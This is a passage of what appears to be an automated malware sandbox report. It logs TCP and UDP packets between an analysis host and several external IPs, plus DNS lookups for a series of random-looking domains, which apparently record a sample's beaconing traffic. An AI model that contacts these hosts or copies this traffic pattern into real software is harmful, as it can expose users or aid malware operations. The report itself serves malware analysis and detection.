                                                              Sep 25, 2024 09:17:41.294373035 CEST80497423.33.130.190192.168.2.8
                                                              Sep 25, 2024 09:17:41.294457912 CEST4974280192.168.2.83.33.130.190
                                                              Sep 25, 2024 09:17:41.307147026 CEST4974280192.168.2.83.33.130.190
                                                              Sep 25, 2024 09:17:41.312067032 CEST80497423.33.130.190192.168.2.8
                                                              Sep 25, 2024 09:17:41.312140942 CEST80497423.33.130.190192.168.2.8
                                                              Sep 25, 2024 09:17:41.754005909 CEST80497423.33.130.190192.168.2.8
                                                              Sep 25, 2024 09:17:41.757041931 CEST4974280192.168.2.83.33.130.190
                                                              Sep 25, 2024 09:17:42.816783905 CEST4974280192.168.2.83.33.130.190
                                                              Sep 25, 2024 09:17:42.821842909 CEST80497423.33.130.190192.168.2.8
                                                              Sep 25, 2024 09:17:43.835515976 CEST4974380192.168.2.83.33.130.190
                                                              Sep 25, 2024 09:17:43.840511084 CEST80497433.33.130.190192.168.2.8
                                                              Sep 25, 2024 09:17:43.840615988 CEST4974380192.168.2.83.33.130.190
                                                              Sep 25, 2024 09:17:43.850404978 CEST4974380192.168.2.83.33.130.190
                                                              Sep 25, 2024 09:17:43.855261087 CEST80497433.33.130.190192.168.2.8
                                                              Sep 25, 2024 09:17:44.300858974 CEST80497433.33.130.190192.168.2.8
                                                              Sep 25, 2024 09:17:44.300925970 CEST80497433.33.130.190192.168.2.8
                                                              Sep 25, 2024 09:17:44.301084042 CEST4974380192.168.2.83.33.130.190
                                                              Sep 25, 2024 09:17:44.304027081 CEST4974380192.168.2.83.33.130.190
                                                              Sep 25, 2024 09:17:44.308985949 CEST80497433.33.130.190192.168.2.8
                                                              Sep 25, 2024 09:17:57.644402027 CEST4974480192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:17:57.649403095 CEST804974452.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:17:57.649483919 CEST4974480192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:17:57.664803982 CEST4974480192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:17:57.669646025 CEST804974452.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:17:58.108431101 CEST804974452.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:17:58.108524084 CEST4974480192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:17:59.176296949 CEST4974480192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:17:59.181179047 CEST804974452.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:00.198422909 CEST4974580192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:00.203350067 CEST804974552.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:00.203479052 CEST4974580192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:00.214818001 CEST4974580192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:00.219628096 CEST804974552.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:00.666419029 CEST804974552.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:00.666493893 CEST4974580192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:01.883280039 CEST4974580192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:01.888962030 CEST804974552.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:02.897811890 CEST4974680192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:02.902746916 CEST804974652.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:02.902818918 CEST4974680192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:02.915519953 CEST4974680192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:02.920495987 CEST804974652.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:02.920511961 CEST804974652.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:03.379970074 CEST804974652.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:03.380024910 CEST4974680192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:04.426142931 CEST4974680192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:04.431416988 CEST804974652.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:05.446193933 CEST4974780192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:05.451175928 CEST804974752.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:05.451258898 CEST4974780192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:05.460616112 CEST4974780192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:05.465466976 CEST804974752.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:05.939368010 CEST804974752.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:05.939409018 CEST804974752.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:05.939548016 CEST4974780192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:05.942435980 CEST4974780192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:05.947259903 CEST804974752.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:11.405350924 CEST4974880192.168.2.838.47.232.144
                                                              Sep 25, 2024 09:18:11.410223961 CEST804974838.47.232.144192.168.2.8
                                                              Sep 25, 2024 09:18:11.410296917 CEST4974880192.168.2.838.47.232.144
                                                              Sep 25, 2024 09:18:11.424036026 CEST4974880192.168.2.838.47.232.144
                                                              Sep 25, 2024 09:18:11.428949118 CEST804974838.47.232.144192.168.2.8
                                                              Sep 25, 2024 09:18:12.305397034 CEST804974838.47.232.144192.168.2.8
                                                              Sep 25, 2024 09:18:12.305459023 CEST804974838.47.232.144192.168.2.8
                                                              Sep 25, 2024 09:18:12.305809021 CEST4974880192.168.2.838.47.232.144
                                                              Sep 25, 2024 09:18:12.926440954 CEST4974880192.168.2.838.47.232.144
                                                              Sep 25, 2024 09:18:13.946451902 CEST4974980192.168.2.838.47.232.144
                                                              Sep 25, 2024 09:18:13.951467037 CEST804974938.47.232.144192.168.2.8
                                                              Sep 25, 2024 09:18:13.951607943 CEST4974980192.168.2.838.47.232.144
                                                              Sep 25, 2024 09:18:13.962995052 CEST4974980192.168.2.838.47.232.144
                                                              Sep 25, 2024 09:18:13.968075037 CEST804974938.47.232.144192.168.2.8
                                                              Sep 25, 2024 09:18:14.847249031 CEST804974938.47.232.144192.168.2.8
                                                              Sep 25, 2024 09:18:14.847280025 CEST804974938.47.232.144192.168.2.8
                                                              Sep 25, 2024 09:18:14.847332954 CEST4974980192.168.2.838.47.232.144
                                                              Sep 25, 2024 09:18:15.474606037 CEST4974980192.168.2.838.47.232.144
                                                              Sep 25, 2024 09:18:16.494482994 CEST4975080192.168.2.838.47.232.144
                                                              Sep 25, 2024 09:18:16.499509096 CEST804975038.47.232.144192.168.2.8
                                                              Sep 25, 2024 09:18:16.499990940 CEST4975080192.168.2.838.47.232.144
                                                              Sep 25, 2024 09:18:16.511149883 CEST4975080192.168.2.838.47.232.144
                                                              Sep 25, 2024 09:18:16.516053915 CEST804975038.47.232.144192.168.2.8
                                                              Sep 25, 2024 09:18:16.516159058 CEST804975038.47.232.144192.168.2.8
                                                              Sep 25, 2024 09:18:17.408889055 CEST804975038.47.232.144192.168.2.8
                                                              Sep 25, 2024 09:18:17.409024954 CEST804975038.47.232.144192.168.2.8
                                                              Sep 25, 2024 09:18:17.409070015 CEST4975080192.168.2.838.47.232.144
                                                              Sep 25, 2024 09:18:18.019920111 CEST4975080192.168.2.838.47.232.144
                                                              Sep 25, 2024 09:18:19.038677931 CEST4975180192.168.2.838.47.232.144
                                                              Sep 25, 2024 09:18:19.043550014 CEST804975138.47.232.144192.168.2.8
                                                              Sep 25, 2024 09:18:19.043617010 CEST4975180192.168.2.838.47.232.144
                                                              Sep 25, 2024 09:18:19.052855968 CEST4975180192.168.2.838.47.232.144
                                                              Sep 25, 2024 09:18:19.057769060 CEST804975138.47.232.144192.168.2.8
                                                              Sep 25, 2024 09:18:19.934047937 CEST804975138.47.232.144192.168.2.8
                                                              Sep 25, 2024 09:18:19.934145927 CEST804975138.47.232.144192.168.2.8
                                                              Sep 25, 2024 09:18:19.934267044 CEST4975180192.168.2.838.47.232.144
                                                              Sep 25, 2024 09:18:19.936918020 CEST4975180192.168.2.838.47.232.144
                                                              Sep 25, 2024 09:18:19.941768885 CEST804975138.47.232.144192.168.2.8
                                                              Sep 25, 2024 09:18:24.974679947 CEST4975280192.168.2.852.230.28.86
                                                              Sep 25, 2024 09:18:24.979485035 CEST804975252.230.28.86192.168.2.8
                                                              Sep 25, 2024 09:18:24.979562044 CEST4975280192.168.2.852.230.28.86
                                                              Sep 25, 2024 09:18:24.990870953 CEST4975280192.168.2.852.230.28.86
                                                              Sep 25, 2024 09:18:24.995646000 CEST804975252.230.28.86192.168.2.8
                                                              Sep 25, 2024 09:18:26.069722891 CEST804975252.230.28.86192.168.2.8
                                                              Sep 25, 2024 09:18:26.069793940 CEST804975252.230.28.86192.168.2.8
                                                              Sep 25, 2024 09:18:26.069854021 CEST4975280192.168.2.852.230.28.86
                                                              Sep 25, 2024 09:18:26.504717112 CEST4975280192.168.2.852.230.28.86
                                                              Sep 25, 2024 09:18:27.528758049 CEST4975380192.168.2.852.230.28.86
                                                              Sep 25, 2024 09:18:27.534018040 CEST804975352.230.28.86192.168.2.8
                                                              Sep 25, 2024 09:18:27.534435987 CEST4975380192.168.2.852.230.28.86
                                                              Sep 25, 2024 09:18:27.545758963 CEST4975380192.168.2.852.230.28.86
                                                              Sep 25, 2024 09:18:27.551084042 CEST804975352.230.28.86192.168.2.8
                                                              Sep 25, 2024 09:18:28.619735956 CEST804975352.230.28.86192.168.2.8
                                                              Sep 25, 2024 09:18:28.620075941 CEST804975352.230.28.86192.168.2.8
                                                              Sep 25, 2024 09:18:28.620131016 CEST4975380192.168.2.852.230.28.86
                                                              Sep 25, 2024 09:18:29.051426888 CEST4975380192.168.2.852.230.28.86
                                                              Sep 25, 2024 09:18:30.070561886 CEST4975480192.168.2.852.230.28.86
                                                              Sep 25, 2024 09:18:30.075356960 CEST804975452.230.28.86192.168.2.8
                                                              Sep 25, 2024 09:18:30.075444937 CEST4975480192.168.2.852.230.28.86
                                                              Sep 25, 2024 09:18:30.088362932 CEST4975480192.168.2.852.230.28.86
                                                              Sep 25, 2024 09:18:30.093420029 CEST804975452.230.28.86192.168.2.8
                                                              Sep 25, 2024 09:18:30.093514919 CEST804975452.230.28.86192.168.2.8
                                                              Sep 25, 2024 09:18:31.152923107 CEST804975452.230.28.86192.168.2.8
                                                              Sep 25, 2024 09:18:31.152976036 CEST804975452.230.28.86192.168.2.8
                                                              Sep 25, 2024 09:18:31.153111935 CEST4975480192.168.2.852.230.28.86
                                                              Sep 25, 2024 09:18:31.598134041 CEST4975480192.168.2.852.230.28.86
                                                              Sep 25, 2024 09:18:32.633996964 CEST4975580192.168.2.852.230.28.86
                                                              Sep 25, 2024 09:18:32.638984919 CEST804975552.230.28.86192.168.2.8
                                                              Sep 25, 2024 09:18:32.639215946 CEST4975580192.168.2.852.230.28.86
                                                              Sep 25, 2024 09:18:32.660769939 CEST4975580192.168.2.852.230.28.86
                                                              Sep 25, 2024 09:18:32.665719032 CEST804975552.230.28.86192.168.2.8
                                                              Sep 25, 2024 09:18:33.704677105 CEST804975552.230.28.86192.168.2.8
                                                              Sep 25, 2024 09:18:33.704756021 CEST804975552.230.28.86192.168.2.8
                                                              Sep 25, 2024 09:18:33.704910040 CEST4975580192.168.2.852.230.28.86
                                                              Sep 25, 2024 09:18:33.707670927 CEST4975580192.168.2.852.230.28.86
                                                              Sep 25, 2024 09:18:33.712440014 CEST804975552.230.28.86192.168.2.8
                                                              Sep 25, 2024 09:18:40.054111004 CEST4975680192.168.2.8133.130.35.90
                                                              Sep 25, 2024 09:18:40.058994055 CEST8049756133.130.35.90192.168.2.8
                                                              Sep 25, 2024 09:18:40.059063911 CEST4975680192.168.2.8133.130.35.90
                                                              Sep 25, 2024 09:18:40.073472023 CEST4975680192.168.2.8133.130.35.90
                                                              Sep 25, 2024 09:18:40.078470945 CEST8049756133.130.35.90192.168.2.8
                                                              Sep 25, 2024 09:18:40.853210926 CEST8049756133.130.35.90192.168.2.8
                                                              Sep 25, 2024 09:18:40.853388071 CEST8049756133.130.35.90192.168.2.8
                                                              Sep 25, 2024 09:18:40.860485077 CEST4975680192.168.2.8133.130.35.90
                                                              Sep 25, 2024 09:18:41.586582899 CEST4975680192.168.2.8133.130.35.90
                                                              Sep 25, 2024 09:18:42.601998091 CEST4975780192.168.2.8133.130.35.90
                                                              Sep 25, 2024 09:18:42.606933117 CEST8049757133.130.35.90192.168.2.8
                                                              Sep 25, 2024 09:18:42.607009888 CEST4975780192.168.2.8133.130.35.90
                                                              Sep 25, 2024 09:18:42.621962070 CEST4975780192.168.2.8133.130.35.90
                                                              Sep 25, 2024 09:18:42.626765966 CEST8049757133.130.35.90192.168.2.8
                                                              Sep 25, 2024 09:18:43.409024000 CEST8049757133.130.35.90192.168.2.8
                                                              Sep 25, 2024 09:18:43.409070015 CEST8049757133.130.35.90192.168.2.8
                                                              Sep 25, 2024 09:18:43.414680004 CEST4975780192.168.2.8133.130.35.90
                                                              Sep 25, 2024 09:18:44.129317045 CEST4975780192.168.2.8133.130.35.90
                                                              Sep 25, 2024 09:18:45.148401022 CEST4975880192.168.2.8133.130.35.90
                                                              Sep 25, 2024 09:18:45.153219938 CEST8049758133.130.35.90192.168.2.8
                                                              Sep 25, 2024 09:18:45.153443098 CEST4975880192.168.2.8133.130.35.90
                                                              Sep 25, 2024 09:18:45.164534092 CEST4975880192.168.2.8133.130.35.90
                                                              Sep 25, 2024 09:18:45.169394970 CEST8049758133.130.35.90192.168.2.8
                                                              Sep 25, 2024 09:18:45.169568062 CEST8049758133.130.35.90192.168.2.8
                                                              Sep 25, 2024 09:18:45.986351967 CEST8049758133.130.35.90192.168.2.8
                                                              Sep 25, 2024 09:18:45.986449957 CEST8049758133.130.35.90192.168.2.8
                                                              Sep 25, 2024 09:18:45.987168074 CEST4975880192.168.2.8133.130.35.90
                                                              Sep 25, 2024 09:18:46.676279068 CEST4975880192.168.2.8133.130.35.90
                                                              Sep 25, 2024 09:18:47.702475071 CEST4975980192.168.2.8133.130.35.90
                                                              Sep 25, 2024 09:18:47.803702116 CEST8049759133.130.35.90192.168.2.8
                                                              Sep 25, 2024 09:18:47.806983948 CEST4975980192.168.2.8133.130.35.90
                                                              Sep 25, 2024 09:18:47.816931963 CEST4975980192.168.2.8133.130.35.90
                                                              Sep 25, 2024 09:18:47.821928978 CEST8049759133.130.35.90192.168.2.8
                                                              Sep 25, 2024 09:18:48.608295918 CEST8049759133.130.35.90192.168.2.8
                                                              Sep 25, 2024 09:18:48.608367920 CEST8049759133.130.35.90192.168.2.8
                                                              Sep 25, 2024 09:18:48.608515024 CEST4975980192.168.2.8133.130.35.90
                                                              Sep 25, 2024 09:18:48.612332106 CEST4975980192.168.2.8133.130.35.90
                                                              Sep 25, 2024 09:18:48.617166996 CEST8049759133.130.35.90192.168.2.8
                                                              Sep 25, 2024 09:18:53.878420115 CEST4976080192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:53.883450031 CEST804976052.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:53.883563995 CEST4976080192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:53.895301104 CEST4976080192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:53.900242090 CEST804976052.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:54.349184990 CEST804976052.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:54.349247932 CEST4976080192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:55.410728931 CEST4976080192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:55.459512949 CEST804976052.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:56.429601908 CEST4976180192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:56.434432030 CEST804976152.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:56.434559107 CEST4976180192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:56.445892096 CEST4976180192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:56.450793028 CEST804976152.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:56.893059969 CEST804976152.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:56.893661022 CEST4976180192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:57.958519936 CEST4976180192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:57.963270903 CEST804976152.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:58.978490114 CEST4976280192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:58.986721039 CEST804976252.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:58.990483999 CEST4976280192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:58.997534037 CEST4976280192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:59.002962112 CEST804976252.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:59.002973080 CEST804976252.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:59.447691917 CEST804976252.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:59.447746992 CEST4976280192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:19:00.510485888 CEST4976280192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:19:00.515475035 CEST804976252.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:19:01.524998903 CEST4976380192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:19:01.529861927 CEST804976352.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:19:01.529923916 CEST4976380192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:19:01.538702965 CEST4976380192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:19:01.543458939 CEST804976352.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:19:02.053178072 CEST804976352.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:19:02.053204060 CEST804976352.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:19:02.055490971 CEST4976380192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:19:02.058530092 CEST4976380192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:19:02.063309908 CEST804976352.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:19:07.143913984 CEST4976480192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:07.148880959 CEST804976484.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:07.148951054 CEST4976480192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:07.162679911 CEST4976480192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:07.167622089 CEST804976484.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:07.604438066 CEST804976484.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:07.604490995 CEST4976480192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:08.681060076 CEST4976480192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:08.685903072 CEST804976484.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:09.697825909 CEST4976580192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:09.702713013 CEST804976584.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:09.706497908 CEST4976580192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:09.721467018 CEST4976580192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:09.726376057 CEST804976584.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:10.163608074 CEST804976584.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:10.168190956 CEST4976580192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:11.223145008 CEST4976580192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:11.229034901 CEST804976584.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:12.242031097 CEST4976680192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:12.247061968 CEST804976684.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:12.249654055 CEST4976680192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:12.262540102 CEST4976680192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:12.267513037 CEST804976684.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:12.267551899 CEST804976684.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:12.860840082 CEST804976684.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:12.862597942 CEST4976680192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:13.770020962 CEST4976680192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:13.774936914 CEST804976684.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:14.790469885 CEST4976780192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:14.795664072 CEST804976784.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:14.798679113 CEST4976780192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:14.806569099 CEST4976780192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:14.811439991 CEST804976784.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:15.268935919 CEST804976784.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:15.268954039 CEST804976784.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:15.268966913 CEST804976784.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:15.269047022 CEST804976784.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:15.269059896 CEST804976784.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:15.269078970 CEST804976784.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:15.269085884 CEST4976780192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:15.269092083 CEST804976784.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:15.269105911 CEST804976784.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:15.269119024 CEST804976784.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:15.269133091 CEST804976784.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:15.269140005 CEST4976780192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:15.269159079 CEST4976780192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:15.269171000 CEST4976780192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:15.269668102 CEST804976784.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:15.269717932 CEST4976780192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:15.275779963 CEST4976780192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:15.281729937 CEST804976784.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:28.976799011 CEST4976880192.168.2.8188.114.96.3
                                                              Sep 25, 2024 09:19:28.982763052 CEST8049768188.114.96.3192.168.2.8
                                                              Sep 25, 2024 09:19:28.983206987 CEST4976880192.168.2.8188.114.96.3
                                                              Sep 25, 2024 09:19:28.994537115 CEST4976880192.168.2.8188.114.96.3
                                                              Sep 25, 2024 09:19:28.999433994 CEST8049768188.114.96.3192.168.2.8
                                                              Sep 25, 2024 09:19:30.504493952 CEST4976880192.168.2.8188.114.96.3
                                                              Sep 25, 2024 09:19:30.509856939 CEST8049768188.114.96.3192.168.2.8
                                                              Sep 25, 2024 09:19:30.512619972 CEST4976880192.168.2.8188.114.96.3
                                                              Sep 25, 2024 09:19:31.523960114 CEST4976980192.168.2.8188.114.96.3
                                                              Sep 25, 2024 09:19:31.528888941 CEST8049769188.114.96.3192.168.2.8
                                                              Sep 25, 2024 09:19:31.528980017 CEST4976980192.168.2.8188.114.96.3
                                                              Sep 25, 2024 09:19:31.543590069 CEST4976980192.168.2.8188.114.96.3
                                                              Sep 25, 2024 09:19:31.548469067 CEST8049769188.114.96.3192.168.2.8
                                                              Sep 25, 2024 09:19:33.575815916 CEST8049769188.114.96.3192.168.2.8
                                                              Sep 25, 2024 09:19:33.576016903 CEST8049769188.114.96.3192.168.2.8
                                                              Sep 25, 2024 09:19:33.576069117 CEST4976980192.168.2.8188.114.96.3

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Sep 25, 2024 09:15:53.993220091 CEST5766253192.168.2.81.1.1.1
                                                              Sep 25, 2024 09:15:54.003417969 CEST53576621.1.1.1192.168.2.8
                                                              Sep 25, 2024 09:15:59.023137093 CEST5634753192.168.2.81.1.1.1
                                                              Sep 25, 2024 09:15:59.157401085 CEST53563471.1.1.1192.168.2.8
                                                              Sep 25, 2024 09:16:16.258639097 CEST5549053192.168.2.81.1.1.1
                                                              Sep 25, 2024 09:16:16.299449921 CEST53554901.1.1.1192.168.2.8
                                                              Sep 25, 2024 09:16:29.430109024 CEST6135853192.168.2.81.1.1.1
                                                              Sep 25, 2024 09:16:29.717833996 CEST53613581.1.1.1192.168.2.8
                                                              Sep 25, 2024 09:16:42.946096897 CEST5138553192.168.2.81.1.1.1
                                                              Sep 25, 2024 09:16:42.959698915 CEST53513851.1.1.1192.168.2.8
                                                              Sep 25, 2024 09:16:56.118357897 CEST5695853192.168.2.81.1.1.1
                                                              Sep 25, 2024 09:16:56.209415913 CEST53569581.1.1.1192.168.2.8
                                                              Sep 25, 2024 09:17:09.523313999 CEST5936253192.168.2.81.1.1.1
                                                              Sep 25, 2024 09:17:09.679593086 CEST53593621.1.1.1192.168.2.8
                                                              Sep 25, 2024 09:17:22.930664062 CEST6183353192.168.2.81.1.1.1
                                                              Sep 25, 2024 09:17:23.006124020 CEST53618331.1.1.1192.168.2.8
                                                              Sep 25, 2024 09:17:36.134726048 CEST6165353192.168.2.81.1.1.1
                                                              Sep 25, 2024 09:17:36.189692020 CEST53616531.1.1.1192.168.2.8
                                                              Sep 25, 2024 09:17:49.321436882 CEST6158753192.168.2.81.1.1.1
                                                              Sep 25, 2024 09:17:49.330636978 CEST53615871.1.1.1192.168.2.8
                                                              Sep 25, 2024 09:17:57.383682966 CEST5948653192.168.2.81.1.1.1
                                                              Sep 25, 2024 09:17:57.641521931 CEST53594861.1.1.1192.168.2.8
                                                              Sep 25, 2024 09:18:10.961893082 CEST5873753192.168.2.81.1.1.1
                                                              Sep 25, 2024 09:18:11.402368069 CEST53587371.1.1.1192.168.2.8
                                                              Sep 25, 2024 09:18:24.945383072 CEST5403153192.168.2.81.1.1.1
                                                              Sep 25, 2024 09:18:24.970890045 CEST53540311.1.1.1192.168.2.8
                                                              Sep 25, 2024 09:18:38.728053093 CEST5748153192.168.2.81.1.1.1
                                                              Sep 25, 2024 09:18:39.725292921 CEST5748153192.168.2.81.1.1.1
                                                              Sep 25, 2024 09:18:40.050841093 CEST53574811.1.1.1192.168.2.8
                                                              Sep 25, 2024 09:18:40.050873995 CEST53574811.1.1.1192.168.2.8
                                                              Sep 25, 2024 09:18:53.618664026 CEST6133253192.168.2.81.1.1.1
                                                              Sep 25, 2024 09:18:53.875441074 CEST53613321.1.1.1192.168.2.8
                                                              Sep 25, 2024 09:19:07.071240902 CEST5606253192.168.2.81.1.1.1
                                                              Sep 25, 2024 09:19:07.140765905 CEST53560621.1.1.1192.168.2.8
                                                              Sep 25, 2024 09:19:23.395802021 CEST6291453192.168.2.81.1.1.1
                                                              Sep 25, 2024 09:19:23.405035019 CEST53629141.1.1.1192.168.2.8

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Sep 25, 2024 09:15:53.993220091 CEST192.168.2.81.1.1.10xee9cStandard query (0)www.asstl.onlineA (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:15:59.023137093 CEST192.168.2.81.1.1.10x92e1Standard query (0)www.cc101.proA (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:16:16.258639097 CEST192.168.2.81.1.1.10x2537Standard query (0)www.popin.spaceA (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:16:29.430109024 CEST192.168.2.81.1.1.10x1f52Standard query (0)www.suarahati20.xyzA (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:16:42.946096897 CEST192.168.2.81.1.1.10x1aefStandard query (0)www.dhkatp.vipA (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:16:56.118357897 CEST192.168.2.81.1.1.10xa414Standard query (0)www.eslameldaramlly.siteA (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:17:09.523313999 CEST192.168.2.81.1.1.10x4ec1Standard query (0)www.pofgof.proA (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:17:22.930664062 CEST192.168.2.81.1.1.10x7b80Standard query (0)www.donante-de-ovulos.bizA (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:17:36.134726048 CEST192.168.2.81.1.1.10x901bStandard query (0)www.airtech365.netA (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:17:49.321436882 CEST192.168.2.81.1.1.10xe2b4Standard query (0)www.bonusgame2024.onlineA (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:17:57.383682966 CEST192.168.2.81.1.1.10xfc8eStandard query (0)www.longfilsalphonse.netA (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:18:10.961893082 CEST192.168.2.81.1.1.10x950cStandard query (0)www.yu35n.topA (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:18:24.945383072 CEST192.168.2.81.1.1.10x90a8Standard query (0)www.52ywq.vipA (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:18:38.728053093 CEST192.168.2.81.1.1.10x5847Standard query (0)www.komart.shopA (IP address)IN (0x0001)false
